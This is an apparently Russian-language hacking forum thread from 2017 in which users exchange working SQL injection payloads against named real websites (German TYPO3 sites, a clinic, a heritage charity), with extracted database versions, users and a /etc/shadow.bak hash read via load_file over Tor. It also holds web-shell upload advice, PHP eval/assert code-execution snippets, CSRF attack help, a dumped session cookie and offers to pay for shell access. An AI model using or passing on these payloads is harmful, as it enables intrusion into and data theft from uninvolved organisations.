http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12 ','13','14','15','16','17','18','19','20','21','22 ','23','24','25','26','27','28','29','30','31','32 ','33','34','35','36','37','38','39','40','41','42 ','43','44','45','46','47','48','49','50','51','52 ','53','54','55','56','57','58','59','60','61','62 ','63','64','65',66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101,102,103,104,105,106,107 ,108,109,110,111,112,113,114,115,116,117,118,119,1 20,121,122,123,124,125,126,127,128,129,130,131,132 ,133,134,135,136,137,138,139,140,141,142,143,144,1 45,146,147,148,149,150,151,152,153,154,155,156,157 ,158,159,160,161,162,163,164,165,166,167,168,169,1 70,171,172,173,174,175,176,177,178,179,180+--+

Хелп, нужно вывод


Не стоит забывать, что иногда параметры можно передавать одинаково как через GET, так и через POST, в котором зачастую ничего не фильтруется!


Code:
POST /en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b HTTP/1.1
Host: www.men-defencetec.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

tx_men_pi1[detail]=(1)--~(select*from(select(concat_ws(0x3a,@@version,data base(),user()))n)f)#

Результат:


array(4 items)
caller => 'TYPO3\CMS\Core\Database\DatabaseConnection::sql_q uery' (53 chars)
ERROR => 'BIGINT value is out of range in '-(~((select '
5.6.27-log:mendefence1:mendefe

nce.1@www1.customers.omc.net (mailto:nce.1@www1.customers.omc.net)
' from dual)))'' (119 chars)

Simon_ru
24.03.2017, 14:34
assert(stripslashes($_REQUEST['p']));

Подскажите кто-нибудь как через assert пролиться? Не пойму как он работает

crlf
24.03.2017, 15:18
eval($_REQUEST[x]);&x=phpcredits();

t0ma5
27.03.2017, 21:50
Gorev said:
↑ (https://antichat.live/posts/4045763/)
ну для ssh пассы в открытом виде еще со времен мамонтов не было, попробуй файлы конфигов фтп, апача




Code:
$ curl -s -k --proxy socks5://127.0.0.1:9150 'http://*.com/ajax/*.php?UserID=1+union+select+1,2,3,load_file%280x2f 6574632f736861646f772e62616b%29,5,6,7,8,9%23' | perl -lane '~s/\\n/\n/g;print' | tail -n 2 | perl -lane '~/[^:]+:(.{15})/;print $1'
$1$piXULrQ7$R3T
$1$piXULrQ7$R3T

shadow.bak

l0mt1k
01.04.2017, 18:34
Кто нибудь может показать пример нормального upload'a, через мой не хочет грузить на сервер шел. Тут проблема в одном из двух, либо я глуп и мал, либо проблема на стороне сервера

P.s. с этим разобрался, в директории нет прав на запись. Можно-ли что-нибудь придумать с этим?

ACat
01.04.2017, 21:16
l0mt1k said:
↑ (https://antichat.live/posts/4067502/)
Кто нибудь может показать пример нормального upload'a, через мой не хочет грузить на сервер шел. Тут проблема в одном из двух, либо я глуп и мал, либо проблема на стороне сервера
P.s. с этим разобрался, в директории нет прав на запись. Можно-ли что-нибудь придумать с этим?


можно. Можно к примеру попробовать рутнуть сервер.

$uname -a

p.s. а если нету прав - поискать где есть. к примеру папки с аватарками.

slva2000
03.04.2017, 19:41
PHP:
$var = $_POST['value'];
$var = addslashes( $var );
$var = stripslashes($var);
$var = str_replace( "", "?>", $var );
$var = mysqli_real_escape_string($var);

############
# v1.
query( "UPDATE comment set text='$var');

# v2.
query( "INSERT INTO comment text='$var' WHERE id = '1');


Ребят, есть варианты провести инъекцию?

ACat
04.04.2017, 21:11
qqq1457 said:
↑ (https://antichat.live/posts/4068608/)
c74a0c532a2dd95bc284c40386244e61 что за алгоритм хеша? здесь зашифрована цифра 1
(это не MD5)


Вам в другой тред

ACat
05.04.2017, 13:45
slva2000 said:
↑ (https://antichat.live/posts/4068146/)

PHP:
$var = $_POST['value'];
$var = addslashes( $var );
$var = stripslashes($var);
$var = str_replace( "", "?>", $var );
$var = mysqli_real_escape_string($var);

############
# v1.
query( "UPDATE comment set text='$var');

# v2.
query( "INSERT INTO comment text='$var' WHERE id = '1');


Ребят, есть варианты провести инъекцию?


mysqli_real_escape_string

а вы как думаете?

DezMond™
05.04.2017, 14:02
помогите вывод сделать, тайм бейс не крутит(


Code:
https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+

t0ma5
05.04.2017, 20:14
DezMond™ said:
↑ (https://antichat.live/posts/4068857/)
помогите вывод сделать, тайм бейс не крутит(

Code:
https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+



вывод через union мне добиться не удалось, но там boolen есть


Code:
118)/**/AND/**/1=2+--+s' | grep 'event_417'

118)/**/AND/**/1=1+--+s' | grep 'event_417'


хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6


Code:
118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'


к information_schema тоже доступ есть


Code:
118)/**/AND/**/(select+table_name+from+information_schema.tables+ limit+1)+like+%27%%27+--+s' | grep 'event_417'


ещё там операция = не всегда работает, лучше юзать like

скульмап по какой то причине в упор скулю не видит

-----------

чорт, там запятая фильтруется -_-

l0mt1k
05.04.2017, 22:04
ACat said:
↑ (https://antichat.live/posts/4067542/)
можно. Можно к примеру попробовать рутнуть сервер.
$uname -a
p.s. а если нету прав - поискать где есть. к примеру папки с аватарками.


Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/

l0mt1k
05.04.2017, 22:12
BabaDook said:
↑ (https://antichat.live/posts/4069095/)
не выполняется потому что php не отрабатывает


Именно

l0mt1k
05.04.2017, 22:16
BabaDook said:
↑ (https://antichat.live/posts/4069098/)
Это потому что шелл не отрабатывает?


В общем, заливаю upload, через него заливаю шелл, открыв его сервер его не обрабатывает как php, а выводит просто текст с кодом.

Хотя upload работает нормально.


шелл на html?


php

ACat
06.04.2017, 04:26
t0ma5 said:
↑ (https://antichat.live/posts/4069028/)
вывод через union мне добиться не удалось, но там boolen есть

Code:
118)/**/AND/**/1=2+--+s' | grep 'event_417'

118)/**/AND/**/1=1+--+s' | grep 'event_417'


хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6

Code:
118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'


к information_schema тоже доступ есть

Code:
118)/**/AND/**/(select+table_name+from+information_schema.tables+ limit+1)+like+%27%%27+--+s' | grep 'event_417'


ещё там операция = не всегда работает, лучше юзать like
скульмап по какой то причине в упор скулю не видит
-----------
чорт, там запятая фильтруется -_-


http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap


l0mt1k said:
↑ (https://antichat.live/posts/4069090/)
Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/


Стоп, что-то я не понял... Есть иньжект, sqlmap раскрутил его, залил через mysql в файл.php код и код не исполняется?

Ааа, понял, в папке, куда залит шелл нету прав...

Попробуй прочитать конфиг.php. Там будет логин и пароль подключения к БД.

ssh mysql@server

t0ma5
06.04.2017, 14:10
ACat said:
↑ (https://antichat.live/posts/4069196/)
http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap


мимо, sqlmap не видит самую простую инъекцию and 1=1/and 1=2 впрочем даже если бы видел тамперы там не помогут, фильтруются запятые, плюс некоторые запросы чуть меняешь логику - не отрабатывают, там проще свой скрипт набросать

DezMond™
07.04.2017, 11:05
чё можно сделать?


Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'

ZodiaX
07.04.2017, 14:00
DezMond™ said:
↑ (https://antichat.live/posts/4069587/)
чё можно сделать?

Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'





Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-

DezMond™
07.04.2017, 14:11
ZodiaX said:
↑ (https://antichat.live/posts/4069637/)

Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-



а дальше? какой толк подбирать колонки, если нет вывода?

ZodiaX
07.04.2017, 14:37
DezMond™ said:
↑ (https://antichat.live/posts/4069648/)
а дальше? какой толк подбирать колонки, если нет вывода?


Да, сорри, думал как слепую можно раскрутить, ан нет.

t0ma5
07.04.2017, 14:49
DezMond™ said:
↑ (https://antichat.live/posts/4069648/)
а дальше? какой толк подбирать колонки, если нет вывода?


вывод может и есть, запятая похоже опять фильтруется

t0ma5
07.04.2017, 15:06
DezMond™ said:
↑ (https://antichat.live/posts/4069648/)
а дальше? какой толк подбирать колонки, если нет вывода?




Code:
union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s

5.6.19-67.0-log

slva2000
07.04.2017, 19:28
ACat said:
↑ (https://antichat.live/posts/4068854/)
mysqli_real_escape_string
а вы как думаете?


Если бы у меня было известное решение, то, наверное, я бы не спрашивал.

В любом случае, спасибо за ответ.

ACat
07.04.2017, 22:55
t0ma5 said:
↑ (https://antichat.live/posts/4069674/)

Code:
union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s

5.6.19-67.0-log


ax*eть.

Парни подскажите, если есть иньекция но сервер на генту и не возвращает никаких ошибок как действовать??

ACat
08.04.2017, 04:52
Вернее что бы не быть голословным вот реальный пример:

?id_list=359982' or 1=1 -- 'a --> вывод

?id_list=359982' or 1=2 -- 'a --> 404

?id_list=359982' ORDER BY 1 -- 'a --> 404

?id_list=359982' GROUP BY 1 -- 'a --> 404

Напомню что ошибки не отображаются.

Эни айдиас?

qqq1457
08.04.2017, 13:46
ACat said:
↑ (https://antichat.live/posts/4069919/)
Вернее что бы не быть голословным вот реальный пример:
?id_list=359982' or 1=1 -- 'a --> вывод
?id_list=359982' or 1=2 -- 'a --> 404
?id_list=359982' ORDER BY 1 -- 'a --> 404
?id_list=359982' GROUP BY 1 -- 'a --> 404
Напомню что ошибки не отображаются.
Эни айдиас?


это blind sql

Про инекции и Способы обнаружения Blind SQL-инъекций:

https://www.ptsecurity.com/upload/corporate/ru-ru/download/PT-devteev-Advanced-SQL-Injection.pdf

софт:/threads/240692/ (https://antichat.live/threads/240692/)

или ручками крути

ACat
08.04.2017, 15:21
qqq1457 said:
↑ (https://antichat.live/posts/4069974/)
это blind sql
Про инекции и Способы обнаружения Blind SQL-инъекций:
https://www.ptsecurity.com/upload/corporate/ru-ru/download/PT-devteev-Advanced-SQL-Injection.pdf
софт:
/threads/240692/ (https://antichat.live/threads/240692/)
или ручками крути


да, это я понимаю. но там такой сервер, что блайндом его всё лето можно взламывать

BabaDook
08.04.2017, 15:22
ACat said:
↑ (https://antichat.live/posts/4069997/)
да, это я понимаю. но там такой сервер, что блайндом его всё лето можно взламывать


Тогда кури в сторону ООБ

ACat
08.04.2017, 18:21
BabaDook said:
↑ (https://antichat.live/posts/4069998/)
Тогда кури в сторону ООБ


прошу прощения, а что такое ООБ?

cat1vo
08.04.2017, 20:12
ACat said:
↑ (https://antichat.live/posts/4070054/)
прошу прощения, а что такое ООБ?


http://www.blackhat.com/presentatio...-europe-09-Damele-SQLInjection-whitepaper.pdf (http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf)

Все подробно и ясно - Page №22

Octavian
08.04.2017, 20:46
прошу помочь залить шелл.Напишите приватно

ACat
08.04.2017, 20:59
cat1vo said:
↑ (https://antichat.live/posts/4070082/)
http://www.blackhat.com/presentatio...-europe-09-Damele-SQLInjection-whitepaper.pdf (http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf)
Все подробно и ясно - Page №22


Спасибо.

Парни, такой вопрос, есть сервер удаленный на нем шелл. Это файловый сервер целого CRM.

Есть сервер базы данных этого же ЦРМ, но он отдельный. Подключится - могу. С сервера на сервер.

Дампнуть не получается. Коннект обрывается посли 20 мб данных. А дампить много.

Как быть?

ACat
09.04.2017, 03:10
cat1vo said:
↑ (https://antichat.live/posts/4070082/)
http://www.blackhat.com/presentatio...-europe-09-Damele-SQLInjection-whitepaper.pdf (http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf)
Все подробно и ясно - Page №22


такс, mysqldump мне помог.

Приступаю к курению мануала.

Кстати, несколько лет назад я был мал и глуп и вы меня не долюбливали. Писал под ником Pirotexnik. Потом в армию забрали)

Всем доброй ночи :3

DezMond™
12.04.2017, 09:17
Code:
http://www.klinikum-stuttgart.de/kliniken-institute-zentren/frauenklinik-schwerpunkt-geburtshilfe/termine-und-veranstaltungen/?tx_aseventcalendar[attendant]=6

тока блинд? или у когото вывод получится сделать?

negativmans
14.04.2017, 17:42
После заливки шелла, при переходе на шелл, становится битый код, и файл выглядит вот так, в чем может быть проблема ? http://prntscr.com/ewegs9

возможно не правильный линк? заливал через картинку

negativmans
14.04.2017, 17:43
помогите найти путь до шелла, за $$$

t0ma5
14.04.2017, 17:46
negativmans said:
↑ (https://antichat.live/posts/4072333/)
После заливки шелла, при переходе на шелл, становится битый код, и файл выглядит вот так, в чем может быть проблема ?
http://prntscr.com/ewegs9
возможно не правильный линк? заливал через картинку


если бы путь был не правильный - он бы у тебя вообще не открылся

посмотри сорцы открываемой страницы, есть в начале пхп код

negativmans
14.04.2017, 17:54
[QUOTE="t0ma5"]
t0ma5 said:
↑ (https://antichat.live/posts/4072336/)
если бы путь был не правильный - он бы у тебя вообще не открылся
посмотри сорцы открываемой страницы, есть в начале пхп код

negativmans
14.04.2017, 18:02
[QUOTE="t0ma5"]
t0ma5 said:
↑ (https://antichat.live/posts/4072336/)
если бы путь был не правильный - он бы у тебя вообще не открылся
посмотри сорцы открываемой страницы, есть в начале пхп код

t0ma5
14.04.2017, 18:35
negativmans said:
↑ (https://antichat.live/posts/4072348/)
а на html нету шеллов?


html это язык разметки

SSI разве что если, хотя наверно экзотика уже, гугли "html ssi web shell"

negativmans
14.04.2017, 19:41
всё таки проблема с путями, потому что картинка даже открывается в тексте! помогите найти путь пожалуйста до шелла!

ACat
15.04.2017, 13:04
возможно нет прав для выполнения. Попробуй в аватарку встроить не большой шелл типа

и потом обратитьтся avatarka.jpg.php?a=phpinfo();

ACat
15.04.2017, 13:05
negativmans said:
↑ (https://antichat.live/posts/4072377/)
всё таки проблема с путями, потому что картинка даже открывается в тексте! помогите найти путь пожалуйста до шелла!


тебе же написали выше, что проблема не с путями, проблема с правами.

Ты случайно не молдован?

cat1vo
15.04.2017, 13:33
ACat said:
↑ (https://antichat.live/posts/4072571/)
возможно нет прав для выполнения. Попробуй в аватарку встроить не большой шелл типа
и потом обратитьтся avatarka.jpg.php?a=phpinfo();


Файл открывается по такой ссылке site.com/user/12345/avatar?123456, где просто выводится содержимое файла, без разницы на расширение, то есть мы получаем его контент, а не выполнение. Так как даже картинка, выводится текстом, отсюда обычная читалка. Получить полный путь до файлов заливаемых на сервер возможности нет (видно что об этом позаботились), что бы понять где и как они лежат и в какой расширение приходят на сервер, возможно оно и заливается в .php, но обратиться к файлу мы не можем, потому всякие догадки про права не верны!

З.Ы. Не стоит делать поспешных выводов не зная сути проблемы! Надеюсь я ясно объяснил и вопросы лишние отпадут.

negativmans
15.04.2017, 13:39
ACat said:
↑ (https://antichat.live/posts/4072572/)
тебе же написали выше, что проблема не с путями, проблема с правами.
Ты случайно не молдован?


мы с cat1vo (https://antichat.live/members/94094/) Молдовани.

Но ситуацию это не меняет не как.

ACat
15.04.2017, 17:35
У меня братва в Кищиневе есть, пишут похоже)

Octavian
18.04.2017, 15:28
Есть CSRF методом GET удаляется пост на саите где временно можно засунуть пробовал как то замутить через онлайн сниффер но там есть только редирект и при этом мои URL палится

Octavian
18.04.2017, 15:28
negativmans said:
↑ (https://antichat.live/posts/4072587/)
мы с
cat1vo (https://antichat.live/members/94094/)
Молдовани.
Но ситуацию это не меняет не как.




ACat said:
↑ (https://antichat.live/posts/4072648/)
У меня братва в Кищиневе есть, пишут похоже)


Я тоже

SooLFaa
24.04.2017, 11:48
Octavian said:
↑ (https://antichat.live/posts/4073841/)
Есть CSRF методом GET удаляется пост на саите где временно можно засунуть пробовал как то замутить через онлайн сниффер но там есть только редирект и при этом мои URL палится


Тебе csrfку надо посылать?

Если гетовская это еще проще даже.

В скрипт php и на любой хост.


Code:
");

Если постом была бы можно было бы тоже легко сделать


Code:
" method= "POST" name="Vuln" >
А далее любой js кой можно написать примерно следующий скрипт
document.getElementByName('Vuln').submit()

Octavian
24.04.2017, 12:07
SooLFaa said:
↑ (https://antichat.live/posts/4076046/)
Тебе csrfку надо посылать?
Если гетовская это еще проще даже.
В скрипт php и на любой хост.

Code:
");

Если постом была бы можно было бы тоже легко сделать

Code:
" method= "POST" name="Vuln" >
А далее любой js кой можно написать примерно следующий скрипт
document.getElementByName('Vuln').submit()



Да но я не хочу зарегать хост только для CSRF мне нужно быстро как то [GET]

Там временное хранение html файлов где то сервис

SooLFaa
24.04.2017, 12:54
Octavian said:
↑ (https://antichat.live/posts/4076063/)
Да но я не хочу зарегать хост только для CSRF мне нужно быстро как то [GET]
Там временное хранение html файлов где то сервис


Если гетом, то зачем тебе посредник. Прям гетом и кинь только за urlencode

Или через сервис какой нить спрячь ссылку

https://tinyurl.com/

Octavian
24.04.2017, 13:51
SooLFaa said:
↑ (https://antichat.live/posts/4076093/)
Если гетом, то зачем тебе посредник. Прям гетом и кинь только за urlencode
Или через сервис какой нить спрячь ссылку
https://tinyurl.com/


Посредник нужен чтоб жертва увидела фото

Octavian
24.04.2017, 14:03
М


SooLFaa said:
↑ (https://antichat.live/posts/407/)
Если гетом, то зачем тебе посредник. Прям гетом и кинь только за urlencode
Или через сервис какой нить спрячь ссылку
https://tinyurl.com/


Мне нужен 2 редирект 1 сылка редирект на CSRR и потом редирект на картинку

SooLFaa
24.04.2017, 15:47
Octavian said:
↑ (https://antichat.live/posts/4076124/)
М
Мне нужен 2 редирект 1 сылка редирект на CSRR и потом редирект на картинку


Так, моя твоя не понимай. Тебе надо нормально задачу сформулировать, а потом мы всем форумом подумаем над её решением.

nuta889900
24.04.2017, 18:34
Шалом.

Знатоки, подскажите, что дальше делать в следующей ситуации:

Получил доступ к config.inc.php ( это phpMyAdmin ).

Есть blowfish_secret.

['auth_type'] стоит 'cookie';

Есть юзер controluser и пароль controlpass.

Также есть PmaAbsoluteUri. Перехожу по нему.

Пытаюсь залогиниться, задав controluser и controlpass - не пускает.

Так понимаю, настроена аутентификауия по кукам ?

Просто первый раз с этим имею дело. Нужно как-то дешифровать blowfish_secret ? Это ведь фраза подсказка ?

Подскажите, куда копать, чтобы зайти в phpMyAdmin ?

Нужно составить куку и её послать для логина ? Или что-то другое ?

nuta889900
29.04.2017, 20:42
Пожалуйста, помогите с вопросом: /threads/424557/page-95#post-4076253 (https://antichat.live/threads/424557/page-95/)

Как дальше быть с config.inc.php ?

Тот_самый_Щуп
29.04.2017, 22:01
Друзья, просьба. Поделитесь кому не жалко сайтом на котором присутствует XXE уязвимость, хочу на её примере изучить данный вектор.

cat1vo
30.04.2017, 15:48
Gorbachev said:
↑ (https://antichat.live/posts/4078179/)
Друзья, просьба. Поделитесь кому не жалко сайтом на котором присутствует XXE уязвимость, хочу на её примере изучить данный вектор.


XML External Entity (http://challenge01.root-me.org/web-serveur/ch29/)

Тот_самый_Щуп
30.04.2017, 23:44
cat1vo (https://antichat.live/members/94094/) благодарю.

PS: но сайт почему то не открывается

SaNDER
01.05.2017, 08:52
Я через Havij пробовал получалось,но частично

например в названии БД b?tsys?em,второй раз крутанёт правильно,остальное так же криво,таблицы походу никогда не выкрутит

поймал на 1000 ms delay,уязвимость time based error. версия sql 5.7.x предположительно(мб 5.7.16)

Если идёт дальше 1500 ms,то уже не крутит,вообще . Как быть ? Скулмап не видит уязвимость вообще,а она есть . Можно и в ЛС,покажу .

RWD
01.05.2017, 12:41
SaNDER said:
↑ (https://antichat.live/posts/4078669/)
Я через Havij пробовал получалось,но частично
например в названии БД b?tsys?em,второй раз крутанёт правильно,остальное так же криво,таблицы походу никогда не выкрутит
поймал на 1000 ms delay,уязвимость time based error. версия sql 5.7.x предположительно(мб 5.7.16)
Если идёт дальше 1500 ms,то уже не крутит,вообще . Как быть ? Скулмап не видит уязвимость вообще,а она есть . Можно и в ЛС,покажу .


--dbms=mysql --level 5 --technique=T

SooLFaa
02.05.2017, 01:33
Gorbachev said:
↑ (https://antichat.live/posts/4078606/)
cat1vo (https://antichat.live/members/94094/) благодарю.

PS: но сайт почему то не открывается


Потому что под своей учеткой зайти надо на root-me.org

SaNDER
06.05.2017, 10:13
RWD said:
↑ (https://antichat.live/posts/4078724/)
--dbms=mysql --level 5 --technique=T




Code:
[CRITICAL] all parameters are not injectable, try to increase --level
/--risk values to perform more tests. Rerun without providing the --technique sw
itch. Give it a go with the --text-only switch if the target page has a low perc
entage of textual content (~96.39% of page content is text)

h3xp1017
06.05.2017, 19:18
SaNDER said:
↑ (https://antichat.live/posts/4080873/)

Code:
[CRITICAL] all parameters are not injectable, try to increase --level
/--risk values to perform more tests. Rerun without providing the --technique sw
itch. Give it a go with the --text-only switch if the target page has a low perc
entage of textual content (~96.39% of page content is text)



добавь --risk=3

можно еще --random-agent и --timeout=60. а вообще странно, что блядский хаваж крутит, а скульмап нет

Yrovdul
09.05.2017, 23:58
Имеется SQL сервер - Red database. Веб-приложения нету, имеется клиентское приложение написанное на C++. Связь между сегментами выполняется через интернет по VPN. Можно ли выполнить SQL инъекцию?

artkar
10.05.2017, 00:32
Yrovdul said:
↑ (https://antichat.live/posts/4082334/)
Имеется SQL сервер - Red database. Веб-приложения нету, имеется клиентское приложение написанное на C++. Связь между сегментами выполняется через интернет по VPN. Можно ли выполнить SQL инъекцию?


Мало инфы. Что за сегменты? Обращение к Сиукул-серверу по защищенному протоколу? Если нет, то можно отправлять запросы прямо так из SQL IDE инжекция не нужна, часто такие приложения делаються для внутренней сети.

Что за SQL-сервер, возможно если крутой сервер типа Оракла, там могучие средства для разделения полномочий и прав. Возможно доступна только не приватная инфа

Yrovdul
10.05.2017, 23:03
artkar said:
↑ (https://antichat.live/posts/4082344/)
Мало инфы. Что за сегменты? Обращение к Сиукул-серверу по защищенному протоколу? Если нет, то можно отправлять запросы прямо так из SQL IDE инжекция не нужна, часто такие приложения делаються для внутренней сети.
Что за SQL-сервер, возможно если крутой сервер типа Оракла, там могучие средства для разделения полномочий и прав. Возможно доступна только не приватная инфа


Дистрибутив Firebird - Red DataBase. Мне необходимо найти уязвимость для SQL инъекцииhttp://s4.uploads.ru/3u4Vo.jpg

artkar
11.05.2017, 00:59
ХЗ Firebird никогда с ней не имел дел.

в архитектуре не вижу ВПН и вообще каких то навороченных защит. Походу классическая двухзвенная архитектура.

Если не знаешь никаких утилит мониторинга для Firebird, то вариантов два:

Собрать снифером дамп и посмотреть там на наличии уязвимых SQL-запросов, но Attention походу контора госслужбы какой то тебя могут спалить, когда снифер работает это очень заметно в сети...

если запросы не найдешь то вариант второй: reverse-engineering клиентского приложения.

Кароч кратко, технология SQL-инжектинга тем и хороша что не зависит от сопутствующего ПО, твоя схема вполне может быть сплотабельная, даже более чем Вэб-приложения, единственно задача поиска требует более сложных технических решений.

Yrovdul
11.05.2017, 13:01
artkar said:
↑ (https://antichat.live/posts/4082882/)
ХЗ Firebird никогда с ней не имел дел.
в архитектуре не вижу ВПН и вообще каких то навороченных защит. Походу классическая двухзвенная архитектура.
Если не знаешь никаких утилит мониторинга для Firebird, то вариантов два:
Собрать снифером дамп и посмотреть там на наличии уязвимых SQL-запросов, но Attention походу контора госслужбы какой то тебя могут спалить, когда снифер работает это очень заметно в сети...
если запросы не найдешь то вариант второй: reverse-engineering клиентского приложения.
Кароч кратко, технология SQL-инжектинга тем и хороша что не зависит от сопутствующего ПО, твоя схема вполне может быть сплотабельная, даже более чем Вэб-приложения, единственно задача поиска требует более сложных технических решений.


1) VPN вверху в облачке написано. Его роль выполняет АПКШ Континент. Справа сегмент сети на уровне города. Слева региональный уровень. Есть ещё 3й на уровне страны.

2) http://www.ibase.ru/d_tools/ Вот вроде бы утилиты для мониторинга и администрирования?

3) Что значит сплотабельная?

artkar
11.05.2017, 20:51
Yrovdul said:
↑ (https://antichat.live/posts/4082991/)
1) VPN вверху в облачке написано. Его роль выполняет АПКШ Континент. Справа сегмент сети на уровне города. Слева региональный уровень. Есть ещё 3й на уровне страны.


А да, точно не заметил, в таком виде ВПН тебе не помеха. Если ты кончено будешь с рабочего места .


Yrovdul said:
↑ (https://antichat.live/posts/4082991/)
2)
http://www.ibase.ru/d_tools/
Вот вроде бы утилиты для мониторинга и администрирования?


Очень хорошо, вот работай. Или ты предлагаешь мне их скачать?


Yrovdul said:
↑ (https://antichat.live/posts/4082991/)
3) Что значит сплотабельная?


Значит подвержена атаке при помощи сплоета.

mcmagnus
21.05.2017, 14:45
доброго времени суток господа. Подскажите, есть ли уязвимости на форумах phpBB 3.0.5 и выше???

По гуглю ничего толкового не нашел, в секурити лаб тоже.

Octavian
26.05.2017, 02:33
Есть саит которыи не разрешает регать больше одного акаунта 1 емаилом но при вводе (пробел)123@mail.ru (mailto:123@mail.ru) почта считается как другая и подтверждение по почте все работает это уже баг какие последующие баги может открыть данный баг?

ACat
26.05.2017, 13:51
Octavian said:
↑ (https://antichat.live/posts/4089497/)
Есть саит которыи не разрешает регать больше одного акаунта 1 емаилом но при вводе (пробел)
123@mail.ru (mailto:123@mail.ru)
почта считается как другая и подтверждение по почте все работает это уже баг какие последующие баги может открыть данный баг?


возможно, что-то в духe " admin@site.com (mailto:admin@site.com) mymail@mail.com (mailto:mymail@mail.com) "

" admin@site.com (mailto:admin@site.com), mymail@mail.com (mailto:mymail@mail.com) "

а потом востановление пароля...

У меня другой вопрос, может cat1vo ответит на него...

Есть сайт, сайт мебельный.

http://mt.ua/

Надо найти в нем баги, что бы взяли на работу.


Cookie:
XSRF-TOKEN=eyJpdiI6Ik1EY3lxWWNPeURrVDhsNWh1MmR4akE9PSIs InZhbHVlIjoiNDQ4dVwvV1dzS3poRCtcL3RRKzdvS25mQlFKaE xFRXE4bU9CTkVVT3I0d0NhQnZKeUJEMFU4d25NZEJKRUtDM2pU OVwvYlFEeTdkc3VJUWpGdk1FTCt4Vmc9PSIsIm1hYyI6IjhjZG JjYjU0N2Y0MTJlZmQ0ZGNiNWJlMTIxZTc3MDY4ZTZlMWQ4NWZh NzA0ZjgyYjIzNjYwOWMzNzlmMTQyOGEifQ%3D%3D; laravel_session=eyJpdiI6Imt1a3Z3eVpJcGJLcTJERjA0ZX p1YXc9PSIsInZhbHVlIjoibWZuUzMxdVRxNjk4b0JxXC9XZU9q SUtNc0E0cjZ4d1JTcDlqZ2R6K2lzejhFWVlCOWIrN3dGRjhIQl dBbzZ6TkJEZkluVEp1WXZERUtFWEpBUG1EWHhBPT0iLCJtYWMi OiI2MjcwOGFjN2VjOTg2NmZmNjJkZjY5ODgyODU4ZGY4MWU4MT diYjE1NWMyZTM4Y2NkMWU4MjkwMzdjMTNlYTAyIn0%3D


раскодировав получаем


Cookie:
XSRF-TOKEN={"iv":"MDcyqYcOyDkT8l5hu2dxjA==","value":"448u\/WWsKzhD+\/tQ+7oKnfBQJhLEEq8mOBNEUOr4wCaBvJyBD0U8wnMdBJEKC3jT 9\/bQDy7dsuIQjFvMEL+xVg==","mac":"8cdbcb547f412efd4dcb5be121e77068e6e1d85fa704f82b23 6609c379f1428a"fQ%3D%3D;
